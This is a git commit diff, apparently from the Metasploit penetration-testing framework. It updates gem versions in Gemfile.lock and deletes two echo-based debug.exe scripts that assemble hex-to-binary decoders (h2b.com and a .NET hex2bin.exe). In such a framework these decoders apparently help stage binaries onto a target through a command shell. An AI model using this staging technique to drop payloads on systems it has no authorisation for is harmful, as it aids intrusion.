Merge upstream/master
commit
57eabda5dc
37
Gemfile.lock
37
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.12.33)
|
||||
metasploit-framework (4.12.40)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -14,9 +14,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.1.19)
|
||||
metasploit-payloads (= 1.1.26)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.0.6)
|
||||
metasploit_payloads-mettle (= 0.0.8)
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ssh
|
||||
|
@ -37,6 +37,7 @@ PATH
|
|||
rex-bin_tools
|
||||
rex-core
|
||||
rex-encoder
|
||||
rex-exploitation
|
||||
rex-java
|
||||
rex-mime
|
||||
rex-nop
|
||||
|
@ -102,7 +103,7 @@ GEM
|
|||
bcrypt (3.1.11)
|
||||
bit-struct (0.15.0)
|
||||
builder (3.2.2)
|
||||
capybara (2.9.2)
|
||||
capybara (2.10.1)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
|
@ -155,7 +156,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (2.0.3)
|
||||
metasploit-credential (2.0.4)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models
|
||||
|
@ -167,8 +168,8 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.1.19)
|
||||
metasploit_data_models (2.0.4)
|
||||
metasploit-payloads (1.1.26)
|
||||
metasploit_data_models (2.0.5)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
|
@ -178,23 +179,22 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.0.6)
|
||||
metasploit_payloads-mettle (0.0.8)
|
||||
method_source (0.8.2)
|
||||
mime-types (3.1)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0521)
|
||||
mini_portile2 (2.1.0)
|
||||
minitest (5.9.1)
|
||||
msgpack (1.0.0)
|
||||
msgpack (1.0.2)
|
||||
multi_json (1.12.1)
|
||||
multi_test (0.1.2)
|
||||
multipart-post (2.0.0)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (3.2.0)
|
||||
network_interface (0.0.1)
|
||||
nokogiri (1.6.8)
|
||||
nokogiri (1.6.8.1)
|
||||
mini_portile2 (~> 2.1.0)
|
||||
pkg-config (~> 1.1.7)
|
||||
octokit (4.3.0)
|
||||
sawyer (~> 0.7.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
|
@ -206,7 +206,6 @@ GEM
|
|||
pcaprub (0.12.4)
|
||||
pg (0.19.0)
|
||||
pg_array_parser (0.0.9)
|
||||
pkg-config (1.1.7)
|
||||
postgres_ext (3.0.0)
|
||||
activerecord (>= 4.0.0)
|
||||
arel (>= 4.0.1)
|
||||
|
@ -249,6 +248,12 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.1)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
rex-encoder
|
||||
rex-text
|
||||
rex-java (0.1.2)
|
||||
rex-mime (0.1.1)
|
||||
rex-text
|
||||
|
@ -272,7 +277,7 @@ GEM
|
|||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.0)
|
||||
rex-text (0.2.1)
|
||||
rex-text (0.2.4)
|
||||
rex-zip (0.1.0)
|
||||
rex-text
|
||||
rkelly-remix (0.0.6)
|
||||
|
@ -307,14 +312,14 @@ GEM
|
|||
simplecov-html (~> 0.10.0)
|
||||
simplecov-html (0.10.0)
|
||||
slop (3.6.0)
|
||||
sqlite3 (1.3.11)
|
||||
sqlite3 (1.3.12)
|
||||
sshkey (1.8.0)
|
||||
thor (0.19.1)
|
||||
thread_safe (0.3.5)
|
||||
timecop (0.8.1)
|
||||
tzinfo (1.2.2)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2016.7)
|
||||
tzinfo-data (1.2016.8)
|
||||
tzinfo (>= 1.0.0)
|
||||
windows_error (0.0.2)
|
||||
xpath (2.0.0)
|
||||
|
@ -341,4 +346,4 @@ DEPENDENCIES
|
|||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.13.2
|
||||
1.13.6
|
||||
|
|
|
@ -1,91 +0,0 @@
|
|||
echo a 0100 >>decoder_stub
|
||||
echo jmp 197 >>decoder_stub
|
||||
echo mov bx,[1bd] >>decoder_stub
|
||||
echo call 131 >>decoder_stub
|
||||
echo mov bx,[1cc] >>decoder_stub
|
||||
echo call 131 >>decoder_stub
|
||||
echo mov ax,4c00 >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo mov ah,3d >>decoder_stub
|
||||
echo mov al,00 >>decoder_stub
|
||||
echo mov dx,1bf >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo mov [1bd],ax >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov ah,3c >>decoder_stub
|
||||
echo mov cx,2 >>decoder_stub
|
||||
echo mov dx,1ce >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo mov [1cc],ax >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov ax,3e00 >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov bx,[1bd] >>decoder_stub
|
||||
echo mov ax,3f00 >>decoder_stub
|
||||
echo mov cx,100 >>decoder_stub
|
||||
echo mov dx,0200 >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo cmp ax,2 >>decoder_stub
|
||||
echo ja 151 >>decoder_stub
|
||||
echo call 178 >>decoder_stub
|
||||
echo call 103 >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov ah,0 >>decoder_stub
|
||||
echo or al,20 >>decoder_stub
|
||||
echo sub al,30 >>decoder_stub
|
||||
echo cmp al,9 >>decoder_stub
|
||||
echo jbe 164 >>decoder_stub
|
||||
echo sub al,31 >>decoder_stub
|
||||
echo cmp al,5 >>decoder_stub
|
||||
echo ja 165 >>decoder_stub
|
||||
echo add al,a >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov ah,ff >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo cmp bp,0 >>decoder_stub
|
||||
echo jne 175 >>decoder_stub
|
||||
echo call 137 >>decoder_stub
|
||||
echo mov bp,ax >>decoder_stub
|
||||
echo mov si,200 >>decoder_stub
|
||||
echo lodsb >>decoder_stub
|
||||
echo dec bp >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo mov cx,di >>decoder_stub
|
||||
echo sub cx,300 >>decoder_stub
|
||||
echo mov bx,[1cc] >>decoder_stub
|
||||
echo mov ax,4000 >>decoder_stub
|
||||
echo mov dx,0300 >>decoder_stub
|
||||
echo int 21 >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo call 168 >>decoder_stub
|
||||
echo call 152 >>decoder_stub
|
||||
echo cmp ah,0 >>decoder_stub
|
||||
echo jne 18b >>decoder_stub
|
||||
echo ret >>decoder_stub
|
||||
echo call 116 >>decoder_stub
|
||||
echo call 123 >>decoder_stub
|
||||
echo mov bp,0 >>decoder_stub
|
||||
echo mov di,300 >>decoder_stub
|
||||
echo call 18b >>decoder_stub
|
||||
echo mov cx,1000 >>decoder_stub
|
||||
echo mul cx >>decoder_stub
|
||||
echo push ax >>decoder_stub
|
||||
echo call 18b >>decoder_stub
|
||||
echo pop dx >>decoder_stub
|
||||
echo or al,dh >>decoder_stub
|
||||
echo stosb >>decoder_stub
|
||||
echo cmp bp, 0 >>decoder_stub
|
||||
echo jne 1a3 >>decoder_stub
|
||||
echo call 178 >>decoder_stub
|
||||
echo jmp 1a0 >>decoder_stub
|
||||
echo db 00,00 >>decoder_stub
|
||||
echo db "testfile.dat",00 >>decoder_stub
|
||||
echo db 00,00 >>decoder_stub
|
||||
echo db "testfile.out",00 >>decoder_stub
|
||||
echo >>decoder_stub
|
||||
echo r cx >>decoder_stub
|
||||
echo 0400 >>decoder_stub
|
||||
echo n h2b.com >>decoder_stub
|
||||
echo w >>decoder_stub
|
||||
echo q >>decoder_stub
|
|
@ -1,819 +0,0 @@
|
|||
echo n decoder_stub.bin > decoder_stub
|
||||
echo r cx >>decoder_stub
|
||||
echo 1400 >>decoder_stub
|
||||
echo f 0100 ffff 00 >>decoder_stub
|
||||
echo e 100 4d 5a 90 >>decoder_stub
|
||||
echo e 104 03 >>decoder_stub
|
||||
echo e 108 04 >>decoder_stub
|
||||
echo e 10c ff ff >>decoder_stub
|
||||
echo e 110 b8 >>decoder_stub
|
||||
echo e 118 40 >>decoder_stub
|
||||
echo e 13c 80 >>decoder_stub
|
||||
echo e 140 0e 1f ba 0e >>decoder_stub
|
||||
echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
|
||||
echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
|
||||
echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
|
||||
echo e 180 50 45 >>decoder_stub
|
||||
echo e 184 4c 01 03 >>decoder_stub
|
||||
echo e 188 85 18 7c 48 >>decoder_stub
|
||||
echo e 194 e0 >>decoder_stub
|
||||
echo e 196 0e 01 0b 01 08 >>decoder_stub
|
||||
echo e 19d 0a >>decoder_stub
|
||||
echo e 1a1 08 >>decoder_stub
|
||||
echo e 1a8 be 28 >>decoder_stub
|
||||
echo e 1ad 20 >>decoder_stub
|
||||
echo e 1b1 40 >>decoder_stub
|
||||
echo e 1b6 40 >>decoder_stub
|
||||
echo e 1b9 20 >>decoder_stub
|
||||
echo e 1bd 02 >>decoder_stub
|
||||
echo e 1c0 04 >>decoder_stub
|
||||
echo e 1c8 04 >>decoder_stub
|
||||
echo e 1d1 80 >>decoder_stub
|
||||
echo e 1d5 02 >>decoder_stub
|
||||
echo e 1dc 03 >>decoder_stub
|
||||
echo e 1de 40 05 >>decoder_stub
|
||||
echo e 1e2 10 >>decoder_stub
|
||||
echo e 1e5 10 >>decoder_stub
|
||||
echo e 1ea 10 >>decoder_stub
|
||||
echo e 1ed 10 >>decoder_stub
|
||||
echo e 1f4 10 >>decoder_stub
|
||||
echo e 200 6c 28 >>decoder_stub
|
||||
echo e 204 4f >>decoder_stub
|
||||
echo e 209 40 >>decoder_stub
|
||||
echo e 20c 30 05 >>decoder_stub
|
||||
echo e 221 60 >>decoder_stub
|
||||
echo e 224 0c >>decoder_stub
|
||||
echo e 228 fc 27 >>decoder_stub
|
||||
echo e 22c 1c >>decoder_stub
|
||||
echo e 259 20 >>decoder_stub
|
||||
echo e 25c 08 >>decoder_stub
|
||||
echo e 268 08 20 >>decoder_stub
|
||||
echo e 26c 48 >>decoder_stub
|
||||
echo e 278 2e 74 65 78 74 >>decoder_stub
|
||||
echo e 280 c4 08 >>decoder_stub
|
||||
echo e 285 20 >>decoder_stub
|
||||
echo e 289 0a >>decoder_stub
|
||||
echo e 28d 02 >>decoder_stub
|
||||
echo e 29c 20 >>decoder_stub
|
||||
echo e 29f 60 2e 72 73 72 63 >>decoder_stub
|
||||
echo e 2a8 30 05 >>decoder_stub
|
||||
echo e 2ad 40 >>decoder_stub
|
||||
echo e 2b1 06 >>decoder_stub
|
||||
echo e 2b5 0c >>decoder_stub
|
||||
echo e 2c4 40 >>decoder_stub
|
||||
echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
|
||||
echo e 2d0 0c >>decoder_stub
|
||||
echo e 2d5 60 >>decoder_stub
|
||||
echo e 2d9 02 >>decoder_stub
|
||||
echo e 2dd 12 >>decoder_stub
|
||||
echo e 2ec 40 >>decoder_stub
|
||||
echo e 2ef 42 >>decoder_stub
|
||||
echo e 300 a0 28 >>decoder_stub
|
||||
echo e 308 48 >>decoder_stub
|
||||
echo e 30c 02 >>decoder_stub
|
||||
echo e 30e 05 >>decoder_stub
|
||||
echo e 310 24 21 >>decoder_stub
|
||||
echo e 314 d8 06 >>decoder_stub
|
||||
echo e 318 01 >>decoder_stub
|
||||
echo e 31c 01 >>decoder_stub
|
||||
echo e 31f 06 >>decoder_stub
|
||||
echo e 350 13 30 04 >>decoder_stub
|
||||
echo e 354 be >>decoder_stub
|
||||
echo e 358 01 >>decoder_stub
|
||||
echo e 35b 11 >>decoder_stub
|
||||
echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
|
||||
echo e 36a 72 01 >>decoder_stub
|
||||
echo e 36e 70 28 10 >>decoder_stub
|
||||
echo e 373 0a >>decoder_stub
|
||||
echo e 376 38 9e >>decoder_stub
|
||||
echo e 37c 02 16 9a 28 11 >>decoder_stub
|
||||
echo e 383 0a 72 4b >>decoder_stub
|
||||
echo e 388 70 72 4f >>decoder_stub
|
||||
echo e 38d 70 6f 12 >>decoder_stub
|
||||
echo e 392 0a 72 51 >>decoder_stub
|
||||
echo e 397 70 72 4f >>decoder_stub
|
||||
echo e 39c 70 6f 12 >>decoder_stub
|
||||
echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
|
||||
echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
|
||||
echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
|
||||
echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
|
||||
echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
|
||||
echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
|
||||
echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
|
||||
echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
|
||||
echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
|
||||
echo e 3f6 70 28 16 >>decoder_stub
|
||||
echo e 3fb 0a 28 17 >>decoder_stub
|
||||
echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
|
||||
echo e 40e 0a >>decoder_stub
|
||||
echo e 410 11 05 6f 19 >>decoder_stub
|
||||
echo e 416 0a >>decoder_stub
|
||||
echo e 419 2a 1e 02 28 1a >>decoder_stub
|
||||
echo e 420 0a 2a >>decoder_stub
|
||||
echo e 424 42 53 4a 42 01 >>decoder_stub
|
||||
echo e 42a 01 >>decoder_stub
|
||||
echo e 430 0c >>decoder_stub
|
||||
echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
|
||||
echo e 442 05 >>decoder_stub
|
||||
echo e 444 6c >>decoder_stub
|
||||
echo e 448 30 02 >>decoder_stub
|
||||
echo e 44c 23 7e >>decoder_stub
|
||||
echo e 450 9c 02 >>decoder_stub
|
||||
echo e 454 d0 02 >>decoder_stub
|
||||
echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
|
||||
echo e 464 6c 05 >>decoder_stub
|
||||
echo e 468 60 >>decoder_stub
|
||||
echo e 46c 23 55 53 >>decoder_stub
|
||||
echo e 470 cc 05 >>decoder_stub
|
||||
echo e 474 10 >>decoder_stub
|
||||
echo e 478 23 47 55 49 44 >>decoder_stub
|
||||
echo e 480 dc 05 >>decoder_stub
|
||||
echo e 484 fc >>decoder_stub
|
||||
echo e 488 23 42 6c 6f 62 >>decoder_stub
|
||||
echo e 494 02 >>decoder_stub
|
||||
echo e 497 01 47 15 02 >>decoder_stub
|
||||
echo e 49c 09 >>decoder_stub
|
||||
echo e 4a1 fa 01 33 >>decoder_stub
|
||||
echo e 4a5 16 >>decoder_stub
|
||||
echo e 4a8 01 >>decoder_stub
|
||||
echo e 4ac 18 >>decoder_stub
|
||||
echo e 4b0 02 >>decoder_stub
|
||||
echo e 4b4 02 >>decoder_stub
|
||||
echo e 4b8 01 >>decoder_stub
|
||||
echo e 4bc 1a >>decoder_stub
|
||||
echo e 4c0 0d >>decoder_stub
|
||||
echo e 4c4 01 >>decoder_stub
|
||||
echo e 4c8 01 >>decoder_stub
|
||||
echo e 4cc 01 >>decoder_stub
|
||||
echo e 4d2 0a >>decoder_stub
|
||||
echo e 4d4 01 >>decoder_stub
|
||||
echo e 4da 06 >>decoder_stub
|
||||
echo e 4dc 36 >>decoder_stub
|
||||
echo e 4de 2f >>decoder_stub
|
||||
echo e 4e0 06 >>decoder_stub
|
||||
echo e 4e2 5f >>decoder_stub
|
||||
echo e 4e4 4d >>decoder_stub
|
||||
echo e 4e6 06 >>decoder_stub
|
||||
echo e 4e8 76 >>decoder_stub
|
||||
echo e 4ea 4d >>decoder_stub
|
||||
echo e 4ec 06 >>decoder_stub
|
||||
echo e 4ee 93 >>decoder_stub
|
||||
echo e 4f0 4d >>decoder_stub
|
||||
echo e 4f2 06 >>decoder_stub
|
||||
echo e 4f4 b2 >>decoder_stub
|
||||
echo e 4f6 4d >>decoder_stub
|
||||
echo e 4f8 06 >>decoder_stub
|
||||
echo e 4fa cb >>decoder_stub
|
||||
echo e 4fc 4d >>decoder_stub
|
||||
echo e 4fe 06 >>decoder_stub
|
||||
echo e 500 e4 >>decoder_stub
|
||||
echo e 502 4d >>decoder_stub
|
||||
echo e 504 06 >>decoder_stub
|
||||
echo e 506 ff >>decoder_stub
|
||||
echo e 508 4d >>decoder_stub
|
||||
echo e 50a 06 >>decoder_stub
|
||||
echo e 50c 1a 01 4d >>decoder_stub
|
||||
echo e 510 06 >>decoder_stub
|
||||
echo e 512 52 01 33 01 06 >>decoder_stub
|
||||
echo e 518 66 01 33 01 06 >>decoder_stub
|
||||
echo e 51e 74 01 4d >>decoder_stub
|
||||
echo e 522 06 >>decoder_stub
|
||||
echo e 524 8d 01 4d >>decoder_stub
|
||||
echo e 528 06 >>decoder_stub
|
||||
echo e 52a bd 01 aa 01 3b >>decoder_stub
|
||||
echo e 530 d1 01 >>decoder_stub
|
||||
echo e 534 06 >>decoder_stub
|
||||
echo e 537 02 e0 01 06 >>decoder_stub
|
||||
echo e 53c 20 02 e0 01 06 >>decoder_stub
|
||||
echo e 542 3e 02 2f >>decoder_stub
|
||||
echo e 546 06 >>decoder_stub
|
||||
echo e 548 5a 02 50 02 06 >>decoder_stub
|
||||
echo e 54e 6b 02 2f >>decoder_stub
|
||||
echo e 552 06 >>decoder_stub
|
||||
echo e 554 85 02 2f >>decoder_stub
|
||||
echo e 558 06 >>decoder_stub
|
||||
echo e 55a 94 02 2f >>decoder_stub
|
||||
echo e 55e 06 >>decoder_stub
|
||||
echo e 560 aa 02 50 02 06 >>decoder_stub
|
||||
echo e 566 bc 02 50 02 >>decoder_stub
|
||||
echo e 56e 01 >>decoder_stub
|
||||
echo e 574 01 >>decoder_stub
|
||||
echo e 576 01 >>decoder_stub
|
||||
echo e 57a 10 >>decoder_stub
|
||||
echo e 57c 16 >>decoder_stub
|
||||
echo e 57e 1e >>decoder_stub
|
||||
echo e 580 05 >>decoder_stub
|
||||
echo e 582 01 >>decoder_stub
|
||||
echo e 584 01 >>decoder_stub
|
||||
echo e 586 50 20 >>decoder_stub
|
||||
echo e 58c 91 >>decoder_stub
|
||||
echo e 58e 3d >>decoder_stub
|
||||
echo e 590 0a >>decoder_stub
|
||||
echo e 592 01 >>decoder_stub
|
||||
echo e 594 1a 21 >>decoder_stub
|
||||
echo e 59a 86 18 42 >>decoder_stub
|
||||
echo e 59e 10 >>decoder_stub
|
||||
echo e 5a0 02 >>decoder_stub
|
||||
echo e 5a4 01 >>decoder_stub
|
||||
echo e 5a6 48 >>decoder_stub
|
||||
echo e 5a8 11 >>decoder_stub
|
||||
echo e 5aa 42 >>decoder_stub
|
||||
echo e 5ac 14 >>decoder_stub
|
||||
echo e 5ae 19 >>decoder_stub
|
||||
echo e 5b0 42 >>decoder_stub
|
||||
echo e 5b2 14 >>decoder_stub
|
||||
echo e 5b4 21 >>decoder_stub
|
||||
echo e 5b6 42 >>decoder_stub
|
||||
echo e 5b8 14 >>decoder_stub
|
||||
echo e 5ba 29 >>decoder_stub
|
||||
echo e 5bc 42 >>decoder_stub
|
||||
echo e 5be 14 >>decoder_stub
|
||||
echo e 5c0 31 >>decoder_stub
|
||||
echo e 5c2 42 >>decoder_stub
|
||||
echo e 5c4 14 >>decoder_stub
|
||||
echo e 5c6 39 >>decoder_stub
|
||||
echo e 5c8 42 >>decoder_stub
|
||||
echo e 5ca 14 >>decoder_stub
|
||||
echo e 5cc 41 >>decoder_stub
|
||||
echo e 5ce 42 >>decoder_stub
|
||||
echo e 5d0 14 >>decoder_stub
|
||||
echo e 5d2 49 >>decoder_stub
|
||||
echo e 5d4 42 >>decoder_stub
|
||||
echo e 5d6 14 >>decoder_stub
|
||||
echo e 5d8 51 >>decoder_stub
|
||||
echo e 5da 42 >>decoder_stub
|
||||
echo e 5dc 19 >>decoder_stub
|
||||
echo e 5de 59 >>decoder_stub
|
||||
echo e 5e0 42 >>decoder_stub
|
||||
echo e 5e2 14 >>decoder_stub
|
||||
echo e 5e4 61 >>decoder_stub
|
||||
echo e 5e6 42 >>decoder_stub
|
||||
echo e 5e8 14 >>decoder_stub
|
||||
echo e 5ea 69 >>decoder_stub
|
||||
echo e 5ec 42 >>decoder_stub
|
||||
echo e 5ee 14 >>decoder_stub
|
||||
echo e 5f0 71 >>decoder_stub
|
||||
echo e 5f2 42 >>decoder_stub
|
||||
echo e 5f4 1e >>decoder_stub
|
||||
echo e 5f6 81 >>decoder_stub
|
||||
echo e 5f8 42 >>decoder_stub
|
||||
echo e 5fa 24 >>decoder_stub
|
||||
echo e 5fc 89 >>decoder_stub
|
||||
echo e 5fe 42 >>decoder_stub
|
||||
echo e 600 10 >>decoder_stub
|
||||
echo e 602 91 >>decoder_stub
|
||||
echo e 604 46 02 29 >>decoder_stub
|
||||
echo e 608 99 >>decoder_stub
|
||||
echo e 60a 5f 02 2e >>decoder_stub
|
||||
echo e 60e a1 >>decoder_stub
|
||||
echo e 610 72 02 33 >>decoder_stub
|
||||
echo e 614 a1 >>decoder_stub
|
||||
echo e 616 7a 02 39 >>decoder_stub
|
||||
echo e 61a a1 >>decoder_stub
|
||||
echo e 61c 8a 02 3d >>decoder_stub
|
||||
echo e 620 b1 >>decoder_stub
|
||||
echo e 622 9c 02 43 >>decoder_stub
|
||||
echo e 626 a1 >>decoder_stub
|
||||
echo e 628 a3 02 49 >>decoder_stub
|
||||
echo e 62c 99 >>decoder_stub
|
||||
echo e 62e b5 02 4f >>decoder_stub
|
||||
echo e 632 c1 >>decoder_stub
|
||||
echo e 634 c3 02 55 >>decoder_stub
|
||||
echo e 638 c1 >>decoder_stub
|
||||
echo e 63a c9 02 10 >>decoder_stub
|
||||
echo e 63e 09 >>decoder_stub
|
||||
echo e 640 42 >>decoder_stub
|
||||
echo e 642 10 >>decoder_stub
|
||||
echo e 644 2e >>decoder_stub
|
||||
echo e 646 0b >>decoder_stub
|
||||
echo e 648 69 >>decoder_stub
|
||||
echo e 64a 2e >>decoder_stub
|
||||
echo e 64c 13 >>decoder_stub
|
||||
echo e 64e 76 >>decoder_stub
|
||||
echo e 650 2e >>decoder_stub
|
||||
echo e 652 1b >>decoder_stub
|
||||
echo e 654 76 >>decoder_stub
|
||||
echo e 656 2e >>decoder_stub
|
||||
echo e 658 23 >>decoder_stub
|
||||
echo e 65a 76 >>decoder_stub
|
||||
echo e 65c 2e >>decoder_stub
|
||||
echo e 65e 2b >>decoder_stub
|
||||
echo e 660 69 >>decoder_stub
|
||||
echo e 662 2e >>decoder_stub
|
||||
echo e 664 33 >>decoder_stub
|
||||
echo e 666 7c >>decoder_stub
|
||||
echo e 668 2e >>decoder_stub
|
||||
echo e 66a 3b >>decoder_stub
|
||||
echo e 66c 76 >>decoder_stub
|
||||
echo e 66e 2e >>decoder_stub
|
||||
echo e 670 4b >>decoder_stub
|
||||
echo e 672 76 >>decoder_stub
|
||||
echo e 674 2e >>decoder_stub
|
||||
echo e 676 53 >>decoder_stub
|
||||
echo e 678 94 >>decoder_stub
|
||||
echo e 67a 2e >>decoder_stub
|
||||
echo e 67c 63 >>decoder_stub
|
||||
echo e 67e be >>decoder_stub
|
||||
echo e 680 2e >>decoder_stub
|
||||
echo e 682 6b >>decoder_stub
|
||||
echo e 684 cb >>decoder_stub
|
||||
echo e 686 2e >>decoder_stub
|
||||
echo e 688 73 >>decoder_stub
|
||||
echo e 68a d4 >>decoder_stub
|
||||
echo e 68c 2e >>decoder_stub
|
||||
echo e 68e 7b >>decoder_stub
|
||||
echo e 690 dd >>decoder_stub
|
||||
echo e 692 5d >>decoder_stub
|
||||
echo e 694 04 80 >>decoder_stub
|
||||
echo e 698 01 >>decoder_stub
|
||||
echo e 6a6 1e >>decoder_stub
|
||||
echo e 6aa 02 >>decoder_stub
|
||||
echo e 6b6 01 >>decoder_stub
|
||||
echo e 6b8 26 >>decoder_stub
|
||||
echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
|
||||
echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
|
||||
echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
|
||||
echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
|
||||
echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
|
||||
echo e 6ef 53 79 73 74 65 6d >>decoder_stub
|
||||
echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
|
||||
echo e 6fd 4d 61 69 6e >>decoder_stub
|
||||
echo e 702 2e 63 74 6f 72 >>decoder_stub
|
||||
echo e 708 61 72 67 73 >>decoder_stub
|
||||
echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
|
||||
echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
|
||||
echo e 733 74 65 >>decoder_stub
|
||||
echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
|
||||
echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
|
||||
echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
|
||||
echo e 786 62 75 74 65 >>decoder_stub
|
||||
echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
|
||||
echo e 79f 62 75 74 65 >>decoder_stub
|
||||
echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
|
||||
echo e 7b8 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
|
||||
echo e 7d3 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
|
||||
echo e 7ee 62 75 74 65 >>decoder_stub
|
||||
echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
|
||||
echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
|
||||
echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
|
||||
echo e 848 62 75 74 65 >>decoder_stub
|
||||
echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
|
||||
echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
|
||||
echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
|
||||
echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
|
||||
echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
|
||||
echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
|
||||
echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
|
||||
echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
|
||||
echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
|
||||
echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
|
